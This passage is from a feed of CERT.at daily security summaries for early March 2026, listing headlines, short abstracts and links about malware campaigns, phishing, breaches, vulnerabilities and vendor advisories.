&lt;A HREF=&quot;https://thehackernews.com/2026/03/multi-stage-voidgeist-malware.html&quot;&gt;https://thehackernews.com/2026/03/multi-stage-voidgeist-malware.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Warning of attacks on Hikvision, Rockwell Automation and Apple products&lt;/h3&gt;

The US IT security agency CISA is warning of ongoing attacks on Hikvision, Rockwell Automation and Apple products.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Warnung-vor-Angriffen-auf-Hikvision-Rockwell-Automation-und-Apple-Produkte-11201384.html&quot;&gt;https://www.heise.de/news/Warnung-vor-Angriffen-auf-Hikvision-Rockwell-Automation-und-Apple-Produkte-11201384.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;London: ten million records stolen in cyberattack on transport authority&lt;/h3&gt;

In 2024 there was a cyberattack on the British authority TfL. It has now emerged that data of ten million customers was also stolen in the incident.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/London-Zehn-Millionen-Datensaetze-bei-Cyberangriff-auf-Verkehrsbehoerde-gestohlen-11202301.html&quot;&gt;https://www.heise.de/news/London-Zehn-Millionen-Datensaetze-bei-Cyberangriff-auf-Verkehrsbehoerde-gestohlen-11202301.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;BSI: 11,500 critical entities registered under NIS2&lt;/h3&gt;

By the end of the registration deadline, thousands of companies had completed the process - but almost 20,000 are probably still missing.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/BSI-11-500-kritische-Einrichtungen-unter-NIS2-registriert-11202673.html&quot;&gt;https://www.heise.de/news/BSI-11-500-kritische-Einrichtungen-unter-NIS2-registriert-11202673.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Fake CleanMyMac site installs SHub Stealer and backdoors crypto wallets&lt;/h3&gt;

We uncovered a fake CleanMyMac site delivering SHub Stealer, a macOS infostealer that steals credentials and silently backdoors crypto wallets.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.malwarebytes.com/blog/threat-intel/2026/03/fake-cleanmymac-site-installs-shub-stealer-and-backdoors-crypto-wallets&quot;&gt;https://www.malwarebytes.com/blog/threat-intel/2026/03/fake-cleanmymac-site-installs-shub-stealer-and-backdoors-crypto-wallets&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;An Investigation Into Years of Undetected Operations Targeting High-Value Sectors&lt;/h3&gt;

In-depth analysis of threat activity we call CL-UNK-1068. We discuss their toolset, including tunneling, reconnaissance and credential theft.
&lt;p /&gt;
&lt;A HREF=&quot;https://unit42.paloaltonetworks.com/cl-unk-1068-targets-critical-sectors/&quot;&gt;https://unit42.paloaltonetworks.com/cl-unk-1068-targets-critical-sectors/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;The Hidden Cyber Risks of Remote Work Infrastructure&lt;/h3&gt;

Hidden cyber risks in remote work include insecure home Wi-Fi, phishing attacks, and data exposure, leaving businesses and employees vulnerable to breaches.
&lt;p /&gt;
&lt;A HREF=&quot;https://hackread.com/hidden-cyber-risks-remote-work-infrastructure/&quot;&gt;https://hackread.com/hidden-cyber-risks-remote-work-infrastructure/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Avira: Deserialize, Delete and Escalate - The Proper Way to Use an AV&lt;/h3&gt;

Avira Internet Security ships with a handful of modules that quietly handle privileged operations in the background: software updates, performance monitoring and system cleanup. Each one runs parts of its workflow as SYSTEM. Three of them don't bother checking what they are actually operating on.
&lt;p /&gt;
&lt;A HREF=&quot;http://blog.quarkslab.com/avira-deserialize-delete-and-escalate-the-proper-way-to-use-an-av.html&quot;&gt;http://blog.quarkslab.com/avira-deserialize-delete-and-escalate-the-proper-way-to-use-an-av.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;A GitHub Issue Title Compromised 4,000 Developer Machines&lt;/h3&gt;

The attack - which Snyk named &quot;Clinejection&quot; - composes five well-understood vulnerabilities into a single exploit that requires nothing more than opening a GitHub issue.
&lt;p /&gt;
&lt;A HREF=&quot;https://grith.ai/blog/clinejection-when-your-ai-tool-installs-another&quot;&gt;https://grith.ai/blog/clinejection-when-your-ai-tool-installs-another&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Fake imToken Chrome Extension Steals Seed Phrases via Phishing Redirects&lt;/h3&gt;

Socket's Threat Research Team uncovered a malicious Chrome extension, lm-oken Chromophore (extension ID bbhaganppipihlhjgaaeeeefbaoihcgi), that impersonates imToken while presenting itself as a hex color visualizer in the Chrome Web Store. Instead of providing the harmless tool it promises, the extension automatically opens a threat actor-controlled phishing site as soon as it is installed, and again whenever the user clicks it.
&lt;p /&gt;
&lt;A HREF=&quot;https://socket.dev/blog/fake-imtoken-chrome-extension-steals-seed-phrases-via-phishing-redirects&quot;&gt;https://socket.dev/blog/fake-imtoken-chrome-extension-steals-seed-phrases-via-phishing-redirects&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;A Satellite Receiver Trusted by Pentagon, ESA Has More Than 20 Security Flaws - and the Maker Never Responded&lt;/h3&gt;

A penetration tester found more than 20 vulnerabilities in a satellite receiver deployed by the U.S. Department of Defense (also referred to as the Department of War), the European Space Agency, and other critical infrastructure operators worldwide - and the device's manufacturer, International Data Casting Corporation (IDC), did not respond to a single disclosure attempt over several months.
&lt;p /&gt;
&lt;A HREF=&quot;https://thecyberexpress.com/satellite-receiver-vulnerabilities-unpatched/&quot;&gt;https://thecyberexpress.com/satellite-receiver-vulnerabilities-unpatched/&lt;/a&gt;




&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;WordPress membership plugin bug exploited to create admin accounts&lt;/h3&gt;

Hackers are exploiting a critical vulnerability in the User Registration &amp; Membership plugin, which is installed on more than 60,000 WordPress sites.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/wordpress-membership-plugin-bug-exploited-to-create-admin-accounts/&quot;&gt;https://www.bleepingcomputer.com/news/security/wordpress-membership-plugin-bug-exploited-to-create-admin-accounts/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Acronis warns of dozens of vulnerabilities in Cyber Protect&lt;/h3&gt;

Acronis is currently warning of more than 20 vulnerabilities in Cyber Protect. Admins should apply the available updates quickly.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Acronis-Cyber-Protect-Zig-Schwachstellen-gefaehrden-Unternehmenssoftware-11201761.html&quot;&gt;https://www.heise.de/news/Acronis-Cyber-Protect-Zig-Schwachstellen-gefaehrden-Unternehmenssoftware-11201761.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;LWN Security updates for Friday&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1061738/&quot;&gt;https://lwn.net/Articles/1061738/&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-03-06T18:36:46Z</dc:date></entry><entry><title>Tageszusammenfassung - 05.03.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/3/tagesberichte-05032026"/><author><name>CERT.at</name></author><updated>2026-03-05T19:24:39Z</updated><published>2026-03-05T19:24:39Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Wednesday 04-03-2026 18:00 - Thursday 05-03-2026 18:00
Handler:     Michael Schlagenhaufer
Co-Handler:  Felician Fuchs


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;Mail2Shell zero-click attack lets hackers hijack FreeScout mail servers&lt;/h3&gt;

A maximum severity vulnerability in the FreeScout helpdesk platform allows hackers to achieve remote code execution without any user interaction or authentication. [..] The flaw is tracked as CVE-2026-28289 and bypasses a fix for another remote code execution (RCE) security issue (CVE-2026-27636) that could be exploited by authenticated users with upload permissions.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/mail2shell-zero-click-attack-lets-hackers-hijack-freescout-mail-servers/&quot;&gt;https://www.bleepingcomputer.com/news/security/mail2shell-zero-click-attack-lets-hackers-hijack-freescout-mail-servers/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Critical vulnerabilities in Cisco Secure Firewall products - updates available&lt;/h3&gt;

On 4 March 2026, Cisco published several advisories addressing a total of 17 vulnerabilities in Cisco Secure Firewall Adaptive Security Appliance (ASA) Software, Cisco Secure Firewall Threat Defense (FTD) Software and Cisco Secure Firewall Management Center (FMC) Software.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cert.at/de/warnungen/2026/3/kritische-sicherheitslucken-in-cisco-secure-firewall-produkten-updates-verfugbar&quot;&gt;https://www.cert.at/de/warnungen/2026/3/kritische-sicherheitslucken-in-cisco-secure-firewall-produkten-updates-verfugbar&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Google says 90 zero-days were exploited in attacks last year&lt;/h3&gt;

Google Threat Intelligence Group (GTIG) tracked 90 zero-day vulnerabilities actively exploited throughout 2025, almost half of them in enterprise software and appliances.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/google-says-90-zero-days-were-exploited-in-attacks-last-year/&quot;&gt;https://www.bleepingcomputer.com/news/security/google-says-90-zero-days-were-exploited-in-attacks-last-year/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Malware-laced OpenClaw installers get Bing AI search boost&lt;/h3&gt;

Think before you download. OpenClaw, the AI agent that can manage just about anything, is risky all by itself, but now fake installers for it are wreaking havoc. Users who searched Bing's AI results for &quot;OpenClaw Windows&quot; were directed to a malicious GitHub repository that delivered information stealers and GhostSocks onto their machines.
&lt;p /&gt;
&lt;A HREF=&quot;https://go.theregister.com/feed/www.theregister.com/2026/03/04/fake_openclaw_installers_malware/&quot;&gt;https://go.theregister.com/feed/www.theregister.com/2026/03/04/fake_openclaw_installers_malware/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Cybercrime: authorities take down the data leak forum LeakBase&lt;/h3&gt;

After seizing the database of LeakBase, one of the world's largest cybercrime forums, authorities identified and arrested several suspects.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Cybercrime-Behoerden-schalten-das-Datenleak-Forum-LeakBase-ab-11199616.html&quot;&gt;https://www.heise.de/news/Cybercrime-Behoerden-schalten-das-Datenleak-Forum-LeakBase-ab-11199616.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;European law enforcement dismantles phishing platform&lt;/h3&gt;

Tycoon2FA was one of the world's largest phishing operations. It gave criminals undetected access to e-mail accounts. It has now been shut down.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Europaeische-Strafverfolgungsbehoerden-zerschlagen-Phishing-Plattform-11199550.html&quot;&gt;https://www.heise.de/news/Europaeische-Strafverfolgungsbehoerden-zerschlagen-Phishing-Plattform-11199550.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;New BoryptGrab Stealer Targets Windows Users via Deceptive GitHub Pages&lt;/h3&gt;

The BoryptGrab campaign illustrates an evolving threat ecosystem targeting users through deceptive software downloads and fake GitHub repositories. Across its many variants, the stealer demonstrates extensive data-harvesting capabilities, with its ability to dynamically stage payloads, bypass analysis through anti-VM and anti-debug checks and offload sensitive operations to encrypted payloads showing a level of engineering sophistication that continues to increase.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.trendmicro.com/en_us/research/26/c/boryptgrab-stealer-targets-users-via-deceptive-github-pages.html&quot;&gt;https://www.trendmicro.com/en_us/research/26/c/boryptgrab-stealer-targets-users-via-deceptive-github-pages.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Fake Zoom, Teams Meeting Invites Use Compromised Certificates to Drop Malware&lt;/h3&gt;

A new phishing campaign is using stolen certificates from TrustConnect Software PTY LTD to sign malware. By impersonating updates for Zoom and Microsoft Teams, hackers install RMM tools to gain persistent, privileged access to networks.
&lt;p /&gt;
&lt;A HREF=&quot;https://hackread.com/fake-zoom-teams-invites-malware-certificates/&quot;&gt;https://hackread.com/fake-zoom-teams-invites-malware-certificates/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Cyberattacks in 2026: the login as a weapon&lt;/h3&gt;

Cybercriminals and nation-state actors are increasingly shifting their focus away from laborious intrusion into systems, according to Cloudflare's 2026 threat report. Instead, they tend to rely on the more efficient approach of simply logging in with stolen credentials.
&lt;p /&gt;
&lt;A HREF=&quot;https://heise.de/-11200132&quot;&gt;https://heise.de/-11200132&lt;/a&gt;




&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;Drupal: AJAX Dashboard - Critical - Access bypass - SA-CONTRIB-2026-022&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.drupal.org/sa-contrib-2026-022&quot;&gt;https://www.drupal.org/sa-contrib-2026-022&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Drupal: Google Analytics GA4 - Moderately critical - Cross-site Scripting - SA-CONTRIB-2026-024&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.drupal.org/sa-contrib-2026-024&quot;&gt;https://www.drupal.org/sa-contrib-2026-024&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;LWN: Security updates for Thursday&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1061464/&quot;&gt;https://lwn.net/Articles/1061464/&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-03-05T19:24:39Z</dc:date></entry><entry><title>Tageszusammenfassung - 04.03.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/3/tagesberichte-04032026"/><author><name>CERT.at</name></author><updated>2026-03-04T18:56:43Z</updated><published>2026-03-04T18:56:43Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Tuesday 03-03-2026 18:00 - Wednesday 04-03-2026 18:00
Handler:     Guenes Holler
Co-Handler:  Michael Schlagenhaufer


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;Fake Tech Support Spam Deploys Customized Havoc C2 Across Organizations&lt;/h3&gt;

The intrusions, identified by Huntress last month across five partner organizations, involved the threat actors using email spam as lures, followed by a phone call from an IT desk that activates a layered malware delivery pipeline.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/03/fake-tech-support-spam-deploys.html&quot;&gt;https://thehackernews.com/2026/03/fake-tech-support-spam-deploys.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Attacks on VMware Aria Operations observed&lt;/h3&gt;

Last week Broadcom published a warning about security vulnerabilities in VMware Aria Operations. The software is also used in Cloud Foundation, Telco Cloud Platform, Telco Cloud Infrastructure and vSphere Foundation, so these products are vulnerable as well. CISA now reports attacks on a vulnerability that allows unauthenticated actors to execute arbitrary commands, and consequently arbitrary malicious code, over the network on VMware Aria Operations.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Angriffe-auf-VMware-Aria-Operations-beobachtet-11198060.html&quot;&gt;https://www.heise.de/news/Angriffe-auf-VMware-Aria-Operations-beobachtet-11198060.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;ESC tickets: high risk when buying via hellotickets.de!&lt;/h3&gt;

There are still almost two months to go until the big Eurovision Song Contest (ESC) spectacle. All shows are already sold out. Nevertheless, the website hellotickets.de purportedly continues to offer tickets.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.watchlist-internet.at/news/esc-tickets-hohes-risiko-helloticketsde/&quot;&gt;https://www.watchlist-internet.at/news/esc-tickets-hohes-risiko-helloticketsde/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Telegram Increasingly Used to Sell Access, Malware and Stolen Logs&lt;/h3&gt;

Cybercriminals are now increasingly using Telegram to sell corporate access, malware subscriptions, and stealer logs, turning the messaging app into a fast cybercrime hub.
&lt;p /&gt;
&lt;A HREF=&quot;https://hackread.com/telegram-used-sell-access-malware-stolen-logs/&quot;&gt;https://hackread.com/telegram-used-sell-access-malware-stolen-logs/&lt;/a&gt;




&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;Cisco Security Advisories 2026 Mar 04&lt;/h3&gt;

On March 4, 2026, Cisco released 27 new security advisories. Two of these advisories impact the Cisco Firewall Management Center and have been classified as critical (Authentication Bypass CVE-2026-20079 and Remote Code Execution CVE-2026-20131).
&lt;p /&gt;
&lt;A HREF=&quot;https://sec.cloudapps.cisco.com/security/center/publicationListing.x&quot;&gt;https://sec.cloudapps.cisco.com/security/center/publicationListing.x&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Vulnerability &amp; Patch Roundup - February 2026&lt;/h3&gt;

To help educate website owners about potential threats to their environments, we've compiled a list of important security updates and vulnerability patches for the WordPress ecosystem this past month.
&lt;p /&gt;
&lt;A HREF=&quot;https://blog.sucuri.net/2026/02/vulnerability-patch-roundup-february-2026.html&quot;&gt;https://blog.sucuri.net/2026/02/vulnerability-patch-roundup-february-2026.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;LWN: Security updates for Wednesday&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1061295/&quot;&gt;https://lwn.net/Articles/1061295/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;[R1] Nessus Manager Versions 10.10.3 and 10.11.3 Fix One Vulnerability&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.tenable.com/security/tns-2026-08&quot;&gt;https://www.tenable.com/security/tns-2026-08&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-03-04T18:56:43Z</dc:date></entry><entry><title>Tageszusammenfassung - 03.03.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/3/tagesberichte-03032026"/><author><name>CERT.at</name></author><updated>2026-03-03T19:25:44Z</updated><published>2026-03-03T19:25:44Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Monday 02-03-2026 18:00 - Tuesday 03-03-2026 18:00
Handler:     Felician Fuchs
Co-Handler:  Michael Schlagenhaufer


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;LLMs can unmask pseudonymous users at scale with surprising accuracy&lt;/h3&gt;

Pseudonymity has never been perfect for preserving privacy. Soon it may be pointless.
&lt;p /&gt;
&lt;A HREF=&quot;https://arstechnica.com/security/2026/03/llms-can-unmask-pseudonymous-users-at-scale-with-surprising-accuracy/&quot;&gt;https://arstechnica.com/security/2026/03/llms-can-unmask-pseudonymous-users-at-scale-with-surprising-accuracy/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Fake Google Security site uses PWA app to steal credentials, MFA codes&lt;/h3&gt;

A phishing campaign is using a fake Google Account security page to deliver a web-based app capable of stealing one-time passcodes, harvesting cryptocurrency wallet addresses, and proxying attacker traffic through victims' browsers.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/fake-google-security-site-uses-pwa-app-to-steal-credentials-mfa-codes/&quot;&gt;https://www.bleepingcomputer.com/news/security/fake-google-security-site-uses-pwa-app-to-steal-credentials-mfa-codes/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Microsoft Warns OAuth Redirect Abuse Delivers Malware to Government Targets&lt;/h3&gt;

Microsoft on Monday warned of phishing campaigns that employ phishing emails and OAuth URL redirection mechanisms to bypass conventional phishing defenses implemented in email and browsers. The activity, the company said, targets government and public-sector organizations with the end goal of redirecting victims to attacker-controlled infrastructure without stealing their tokens.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/03/microsoft-warns-oauth-redirect-abuse.html&quot;&gt;https://thehackernews.com/2026/03/microsoft-warns-oauth-redirect-abuse.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Open-Source CyberStrikeAI Deployed in AI-Driven FortiGate Attacks Across 55 Countries&lt;/h3&gt;

The threat actor behind the recently disclosed artificial intelligence (AI)-assisted campaign targeting Fortinet FortiGate appliances leveraged an open-source, AI-native security testing platform called CyberStrikeAI to execute the attacks.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/03/open-source-cyberstrikeai-deployed-in.html&quot;&gt;https://thehackernews.com/2026/03/open-source-cyberstrikeai-deployed-in.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Until last month, attackers could've stolen info from Perplexity Comet users just by sending a calendar invite&lt;/h3&gt;

AI browsing agent left local files open for the taking. If you wanted to steal local files from someone using Perplexity's Comet browser, until last month you could just schedule the theft by sending your victim a calendar event.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.theregister.com/2026/03/03/perplexity_comet_browser_hole_cal_invite/&quot;&gt;https://www.theregister.com/2026/03/03/perplexity_comet_browser_hole_cal_invite/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Breaking Out of Citrix and other Restricted Desktop Environments&lt;/h3&gt;

Many organisations are turning to virtualisation of apps and desktops. This often involves virtualisation platforms such as Citrix to deliver these services. Get your configuration or lock-down wrong and you'll find users &quot;breaking out&quot; of the environment you thought you had secured.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/&quot;&gt;https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Fake hotel website as the basis for a combined fraud scheme&lt;/h3&gt;

Through the fake website of a hotel, criminals try to obtain their victims' contact details and (presumably) their money. In addition, they use the fake site's domain to send phishing e-mails.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.watchlist-internet.at/news/fake-hotelwebsite-kombi-betrugsmasche/&quot;&gt;https://www.watchlist-internet.at/news/fake-hotelwebsite-kombi-betrugsmasche/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Anonymous credentials: an illustrated primer&lt;/h3&gt;

This post has been on my back burner for well over a year. This has bothered me, because every month that goes by I become more convinced that anonymous authentication is the most important topic we could be talking about as cryptographers. This is because I'm very worried that we're headed into a bit of a privacy dystopia, driven largely by bad legislation and the proliferation of AI.
&lt;p /&gt;
&lt;A HREF=&quot;https://blog.cryptographyengineering.com/2026/03/02/anonymous-credentials-an-illustrated-primer/&quot;&gt;https://blog.cryptographyengineering.com/2026/03/02/anonymous-credentials-an-illustrated-primer/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Threat Brief: March 2026 Escalation of Cyber Risk Related to Iran&lt;/h3&gt;

Unit 42 details recent Iranian cyberattack activity, sharing direct observations of phishing, hacktivist activity and cybercrime. We include recommendations for defenders.
&lt;p /&gt;
&lt;A HREF=&quot;https://unit42.paloaltonetworks.com/iranian-cyberattacks-2026/&quot;&gt;https://unit42.paloaltonetworks.com/iranian-cyberattacks-2026/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Silver Dragon: China Nexus Cyber Espionage Group Targeting Governments in Asia and Europe&lt;/h3&gt;

Silver Dragon is a China nexus cyber espionage group targeting government ministries and public sector organizations across Southeast Asia, with additional victims identified in Europe. The group gains initial access through exploitation of public-facing servers and targeted phishing campaigns aimed at government entities.
&lt;p /&gt;
&lt;A HREF=&quot;https://blog.checkpoint.com/research/silver-dragon-china-nexus-cyber-espionage-group-targeting-governments-in-asia-and-europe/&quot;&gt;https://blog.checkpoint.com/research/silver-dragon-china-nexus-cyber-espionage-group-targeting-governments-in-asia-and-europe/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Hackers Abuse .arpa Top-Level Domain to Host Phishing Scams&lt;/h3&gt;

Hackers abuse the .arpa Top-Level Domain to host phishing scams, using IPv6 tunnels, reverse DNS tricks, and shadow domains to bypass security checks.
&lt;p /&gt;
&lt;A HREF=&quot;https://hackread.com/hackers-arpa-top-level-domain-phishing-scams/&quot;&gt;https://hackread.com/hackers-arpa-top-level-domain-phishing-scams/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Coruna: The Mysterious Journey of a Powerful iOS Exploit Kit&lt;/h3&gt;

Google Threat Intelligence Group (GTIG) has identified a new and powerful exploit kit targeting Apple iPhone models running iOS version 13.0 (released in September 2019) up to version 17.2.1 (released in December 2023). The exploit kit, named &quot;Coruna&quot; by its developers, contained five full iOS exploit chains and a total of 23 exploits.
&lt;p /&gt;
&lt;A HREF=&quot;https://cloud.google.com/blog/topics/threat-intelligence/coruna-powerful-ios-exploit-kit/&quot;&gt;https://cloud.google.com/blog/topics/threat-intelligence/coruna-powerful-ios-exploit-kit/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Analysis of an Integrated Phishing Campaign Utilizing Google Cloud Infrastructure&lt;/h3&gt;

In recent weeks, a highly organized phishing campaign has surfaced, characterized by its use of legitimate Google infrastructure to bypass standard security filters. I have identified more than 25 distinct phishing emails targeting a single account, all of which ultimately direct users to a specific URL: hxxps://storage[.]googleapis[.]com/whilewait/comessuccess.html.
&lt;p /&gt;
&lt;A HREF=&quot;https://malwr-analysis.com/2026/03/03/analysis-of-an-integrated-phishing-campaign-utilizing-google-cloud-infrastructure/&quot;&gt;https://malwr-analysis.com/2026/03/03/analysis-of-an-integrated-phishing-campaign-utilizing-google-cloud-infrastructure/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Sometimes, You Can Just Feel The Security In The Design (Juniper Junos Evolved CVE-2026-21902 Pre-Auth RCE)&lt;/h3&gt;

On today's &quot;good news disguised as other things&quot; segment, we're turning our gaze to CVE-2026-21902, a recently disclosed &quot;Incorrect Permission Assignment for Critical Resource&quot; vulnerability affecting Juniper's Junos OS Evolved platform. This vulnerability affects only Juniper's PTX Series of devices, apparently.
&lt;p /&gt;
&lt;A HREF=&quot;https://labs.watchtowr.com/sometimes-you-can-just-feel-the-security-in-the-design-junos-os-evolved-cve-2026-21902-rce/&quot;&gt;https://labs.watchtowr.com/sometimes-you-can-just-feel-the-security-in-the-design-junos-os-evolved-cve-2026-21902-rce/&lt;/a&gt;

&lt;hr&gt;

&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;Dangerous security vulnerability: attacks on Android users observed&lt;/h3&gt;

A dangerous security vulnerability in a Qualcomm graphics component is being actively exploited. Android users should update as soon as possible.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.golem.de/news/gefaehrliche-sicherheitsluecke-angriffe-auf-android-nutzer-beobachtet-2603-206025.html&quot;&gt;https://www.golem.de/news/gefaehrliche-sicherheitsluecke-angriffe-auf-android-nutzer-beobachtet-2603-206025.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;HPE AutoPass License Server allows authentication bypass&lt;/h3&gt;

HPE warns of a serious security vulnerability in the HPE AutoPass License Server (APLS). Authentication can be bypassed.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/HPE-AutoPass-License-Server-erlaubt-Umgehung-der-Authentifizierung-11196562.html&quot;&gt;https://www.heise.de/news/HPE-AutoPass-License-Server-erlaubt-Umgehung-der-Authentifizierung-11196562.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;HCL BigFix: attackers can access data in the file system&lt;/h3&gt;

The endpoint management platform HCL BigFix is vulnerable. Security updates are available.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/HCL-BigFix-Angreifer-koennen-auf-Daten-im-Dateisystem-zugreifen-11196966.html&quot;&gt;https://www.heise.de/news/HCL-BigFix-Angreifer-koennen-auf-Daten-im-Dateisystem-zugreifen-11196966.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;LWN: Security updates for Tuesday&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1061043/&quot;&gt;https://lwn.net/Articles/1061043/&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-03-03T19:25:44Z</dc:date></entry><entry><title>Tageszusammenfassung - 02.03.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/3/tagesberichte-02032026"/><author><name>CERT.at</name></author><updated>2026-03-02T19:26:53Z</updated><published>2026-03-02T19:26:53Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Friday 27-02-2026 18:00 - Monday 02-03-2026 18:00
Handler:     Felician Fuchs
Co-Handler:  Michael Schlagenhaufer


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;Microsoft testing Windows 11 batch file security improvements&lt;/h3&gt;

Microsoft is rolling out new Windows 11 Insider Preview builds that improve security and performance during batch file or CMD script execution.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/microsoft/microsoft-testing-windows-11-batch-file-security-improvements/&quot;&gt;https://www.bleepingcomputer.com/news/microsoft/microsoft-testing-windows-11-batch-file-security-improvements/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;QuickLens Chrome extension steals crypto, shows ClickFix attack&lt;/h3&gt;

A Chrome extension named &quot;QuickLens - Search Screen with Google Lens&quot; has been removed from the Chrome Web Store after it was compromised to push malware and attempt to steal crypto from thousands of users.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/quicklens-chrome-extension-steals-crypto-shows-clickfix-attack/&quot;&gt;https://www.bleepingcomputer.com/news/security/quicklens-chrome-extension-steals-crypto-shows-clickfix-attack/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;UK warns of Iranian cyberattack risks amid Middle-East conflict&lt;/h3&gt;

The United Kingdom's National Cyber Security Centre (NCSC) alerted British organizations to a heightened risk of Iranian cyberattacks amid the ongoing conflict in the Middle East.
&lt;p /&gt;
